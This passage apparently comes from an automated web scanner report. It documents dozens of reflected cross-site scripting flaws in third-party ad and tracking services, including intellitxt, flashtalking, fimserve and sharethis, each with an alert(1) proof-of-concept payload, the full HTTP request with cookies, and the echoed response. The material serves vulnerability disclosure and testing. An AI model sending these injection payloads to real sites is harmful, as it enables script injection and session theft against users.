http://www.omniture.com/en/products/conversion/testandtarget User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Length: 187 Date: Tue, 26 Apr 2011 21:04:00 GMT Server: Test & Target
if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').get('SiteCatalyst: event', 0d3c5f<script>alert(1)</script>9584e60e0db).setOffer(new mboxOfferDefault()).loaded();}
The value of the px request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33802'%3balert(1)//c94ddc006d4 was submitted in the px parameter. This input was echoed as 33802';alert(1)//c94ddc006d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bht/?px=2033802'%3balert(1)//c94ddc006d4&v=1&rnd=1303843577231 HTTP/1.1 Host: p.opt.fimserve.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=4579132553189.993? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; DMEXP=4; UI="2a8dbca1b98673a117|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; ssrtb=0; LO=00GM67mfm00008f500v7
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE" Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=ISO-8859-1 Content-Length: 96 Date: Tue, 26 Apr 2011 18:46:49 GMT
var error='java.lang.NumberFormatException: For input string: "2033802';alert(1)//c94ddc006d4"';
The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 78020<x%20style%3dx%3aexpression(alert(1))>7f33d133aba was submitted in the name parameter. This input was echoed as 78020<x style=x:expression(alert(1))>7f33d133aba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bf287%3balert(1)//f83feec8c47 was submitted in the jscallback parameter. This input was echoed as bf287;alert(1)//f83feec8c47 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /al.asp?ts=20110426184640&cc=us&hk=1&ipid=20029&mh=bd3142edfc2bce02d9fc379eee21c2c1&pvm=f67439ad677e2c9299a82dfc253295cd&pvu=014CCF305AC145B7BA348BA3CAACA02D&rcc=us&so=0&prf=ll%3A19249%7Cintl%3A41679%7Cpreprochrome%3A308%7Cgetconchrome%3A237%7Cadvint%3A42259%7Cadvl%3A42259%7Ctl%3A42259&jscallback=$iTXT.js.callback1bf287%3balert(1)//f83feec8c47 HTTP/1.1 Host: realestate.msn.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 18:47:18 GMT; Path=/ Content-Type: text/javascript Content-Length: 65 Date: Tue, 26 Apr 2011 18:47:18 GMT Age: 0 Connection: keep-alive
5.163. http://realestate.msn.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://realestate.msn.us.intellitxt.com
Path: /intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7366'-alert(1)-'b7e52cebacd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /intellitxt/front.asp?ipid=20029&f7366'-alert(1)-'b7e52cebacd=1 HTTP/1.1 Host: realestate.msn.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-
Response
HTTP/1.1 200 OK P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyHm3AA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 18:46:03 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyHm3QA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 18:46:03 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Tue, 26 Apr 2011 18:46:03 GMT Age: 0 Connection: keep-alive Content-Length: 11116
document.itxtDisabled=1; document.itxtDebugOn=false; if(document.itxtDisabled){ document.itxtInProg=1; if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT ...[SNIP]... tp://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=20000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110426184603";})();$iTXT.js.serverUrl='http://realestate.msn.us.intellitxt.com';$iTXT.js.pageQuery='ipid=20029&f7366'-alert(1)-'b7e52cebacd=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();}; }
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9c51d%3balert(1)//8c141cbb073 was submitted in the jscallback parameter. This input was echoed as 9c51d;alert(1)//8c141cbb073 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v4/init?ts=1303843577474&pagecl=37902&fv=10&muid=&refurl=http%3A%2F%2Frealestate.msn.com%2Farticle.aspx%3Fcp-documentid%3D28280145&ipid=20029&jscallback=$iTXT.js.callback09c51d%3balert(1)//8c141cbb073 HTTP/1.1 Host: realestate.msn.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Tue, 26 Apr 2011 18:47:45 GMT Age: 0 Connection: keep-alive Content-Length: 7166
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback09c51d;alert(1)//8c141cbb073({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}
5.165. http://realestate.msn.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://realestate.msn.us.intellitxt.com
Path: /v4/init
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4bd9"-alert(1)-"7a83dccfee2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v4/init?ts=1303843577474&pagecl=37902&fv=10&muid=&refurl=http%3A%2F%2Frealestate.msn.com%2Farticle.aspx%3Fcp-documentid%3D28280145&ipid=20029&jscallback=$iTXT.js.callback0&a4bd9"-alert(1)-"7a83dccfee2=1 HTTP/1.1 Host: realestate.msn.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Tue, 26 Apr 2011 18:47:55 GMT Age: 0 Connection: keep-alive Content-Length: 7147
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... illa/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16","REGIONNAME":"Texas","muid":"","city":"Dallas","jscallback":"$iTXT.js.callback0","a4bd9"-alert(1)-"7a83dccfee2":"1","reg":"tx","refurl":"http://realestate.msn.com/article.aspx?cp-documentid\u003d28280145","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.params){$iT ...[SNIP]...
The value of the ctp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6b87'%3balert(1)//32ed94e5709 was submitted in the ctp parameter. This input was echoed as d6b87';alert(1)//32ed94e5709 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rrserver/p13n_generated.js?a=756bd9ec9a083c52&ts=1303848188756&pt=%7Ccategory_page.bottom&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&s=bijb1vookoje2tnvwh5oouwn&ctp=%7C0%3Apromcode%253D600582C43552%7C1%3Apromtype%253Dinternald6b87'%3balert(1)//32ed94e5709&l=1 HTTP/1.1 Host: recs.richrelevance.com Proxy-Connection: keep-alive Referer: http://west.thomson.com/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function rrAttrib(linkurl){ var rrcart_img = new Image(); rrcart_img.src= linkurl;}var rr_recs={placements:[{used:false,placementType:'category_page.bottom',html:'<div class="r3_recommendations"><div ...[SNIP]... <a href="http://west.thomson.com/store/AddItem.aspx?Product_id=162495&MaterialNumber=22061301&Product_type=1&promcode=600582C43552&promtype=internald6b87';alert(1)//32ed94e5709"> ...[SNIP]...
The value of the 94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 786bc"-alert(1)-"2db9af1c3c0 was submitted in the 94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=786bc"-alert(1)-"2db9af1c3c0&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=1210EC55BB9841"
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:40:40 GMT Server: Jetty(6.1.22) Content-Length: 464 Cache-Control: no-cache, no-store content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061003 (MII-APC/1.6)
var ftGUID_94537="1210EC55BB9841"; var ftConfID_94537="0"; var ftParams_94537="click=786bc"-alert(1)-"2db9af1c3c0&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235"; var ftKeyword_94537=""; var ftSegment_94537=""; var ftSegmentList_94537=[]; var ftRuleMatch_94537="0";
The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fd9e"-alert(1)-"1376e3d3251 was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.62648372353fd9e"-alert(1)-"1376e3d3251 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=1210EC55BB9841"
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:41:40 GMT Server: Jetty(6.1.22) Content-Length: 464 Cache-Control: no-cache, no-store content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061008 (MII-APC/1.6)
var ftGUID_94537="1210EC55BB9841"; var ftConfID_94537="0"; var ftParams_94537="click=&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.62648372353fd9e"-alert(1)-"1376e3d3251"; var ftKeyword_94537=""; var ftSegment_94537=""; var ftSegmentList_94537=[]; var ftRuleMatch_94537="0";
The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71dab"-alert(1)-"4addb22c6fd was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=&ftadz=71dab"-alert(1)-"4addb22c6fd&ftscw=&cachebuster=602976.6264837235 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=1210EC55BB9841"
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:41:19 GMT Server: Jetty(6.1.22) Content-Length: 464 Cache-Control: no-cache, no-store content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061008 (MII-APC/1.6)
var ftGUID_94537="1210EC55BB9841"; var ftConfID_94537="0"; var ftParams_94537="click=&ftx=&fty=&ftadz=71dab"-alert(1)-"4addb22c6fd&ftscw=&cachebuster=602976.6264837235"; var ftKeyword_94537=""; var ftSegment_94537=""; var ftSegmentList_94537=[]; var ftRuleMatch_94537="0";
The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af48e"-alert(1)-"d29e837d092 was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=&ftadz=&ftscw=af48e"-alert(1)-"d29e837d092&cachebuster=602976.6264837235 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=1210EC55BB9841"
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:41:30 GMT Server: Jetty(6.1.22) Content-Length: 464 Cache-Control: no-cache, no-store content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061005 (MII-APC/1.6)
var ftGUID_94537="1210EC55BB9841"; var ftConfID_94537="0"; var ftParams_94537="click=&ftx=&fty=&ftadz=&ftscw=af48e"-alert(1)-"d29e837d092&cachebuster=602976.6264837235"; var ftKeyword_94537=""; var ftSegment_94537=""; var ftSegmentList_94537=[]; var ftRuleMatch_94537="0";
The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5368a"-alert(1)-"128e10b5eda was submitted in the ftx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=5368a"-alert(1)-"128e10b5eda&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=1210EC55BB9841"
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:40:51 GMT Server: Jetty(6.1.22) Cache-Control: no-cache, no-store Content-Length: 464 content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061006 (MII-APC/1.6)
var ftGUID_94537="1210EC55BB9841"; var ftConfID_94537="0"; var ftParams_94537="click=&ftx=5368a"-alert(1)-"128e10b5eda&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235"; var ftKeyword_94537=""; var ftSegment_94537=""; var ftSegmentList_94537=[]; var ftRuleMatch_94537="0";
The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84b00"-alert(1)-"cac21056698 was submitted in the fty parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=84b00"-alert(1)-"cac21056698&ftadz=&ftscw=&cachebuster=602976.6264837235 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=1210EC55BB9841"
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:41:07 GMT Server: Jetty(6.1.22) Content-Length: 464 Cache-Control: no-cache, no-store content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061001 (MII-APC/1.6)
var ftGUID_94537="1210EC55BB9841"; var ftConfID_94537="0"; var ftParams_94537="click=&ftx=&fty=84b00"-alert(1)-"cac21056698&ftadz=&ftscw=&cachebuster=602976.6264837235"; var ftKeyword_94537=""; var ftSegment_94537=""; var ftSegmentList_94537=[]; var ftRuleMatch_94537="0";
5.173. http://servedby.flashtalking.com/imp/3/14752 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://servedby.flashtalking.com
Path: /imp/3/14752
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be3a7"-alert(1)-"c5145c4eafe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235&be3a7"-alert(1)-"c5145c4eafe=1 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=1210EC55BB9841"
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:41:45 GMT Server: Jetty(6.1.22) P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript Cache-Control: no-cache, no-store pragma: no-cache Content-Length: 467 Via: 1.1 mdw061008 (MII-APC/1.6)
var ftGUID_94537="1210EC55BB9841"; var ftConfID_94537="0"; var ftParams_94537="click=&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235&be3a7"-alert(1)-"c5145c4eafe=1"; var ftKeyword_94537=""; var ftSegment_94537=""; var ftSegmentList_94537=[]; var ftRuleMatch_94537="0";
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 9663e<script>alert(1)</script>4a63942b3e0 was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/getApi.php?return=json&url=http%3A%2F%2Fwww.computerworlduk.com%2Fnews%2Fsecurity%2F3276305%2Foracle-responds-to-hacker-group-and-patches-javacom-vulnerability%2F%3Folo%3Drss&fpc=8f316ea-12f93c9a01d-4bc8d0c8-1&cb=initWidgetOnSuccess9663e<script>alert(1)</script>4a63942b3e0&service=initWidget HTTP/1.1 Host: wd.sharethis.com Proxy-Connection: keep-alive Referer: http://edge.sharethis.com/share4x/index.1f60cca3a67f69342fce2ed55af68ca9.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1; __uset=yes
The value of the FindingMethod request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 970be"style%3d"x%3aexpression(alert(1))"b6e0c02100b was submitted in the FindingMethod parameter. This input was echoed as 970be"style="x:expression(alert(1))"b6e0c02100b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the FindingMethod request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3b99"%3balert(1)//ee36c302041 was submitted in the FindingMethod parameter. This input was echoed as c3b99";alert(1)//ee36c302041 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the PromCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8a66"style%3d"x%3aexpression(alert(1))"2617e1b896b was submitted in the PromCode parameter. This input was echoed as a8a66"style="x:expression(alert(1))"2617e1b896b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the PromCode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbbd9"%3balert(1)//e1045719b6a was submitted in the PromCode parameter. This input was echoed as cbbd9";alert(1)//e1045719b6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
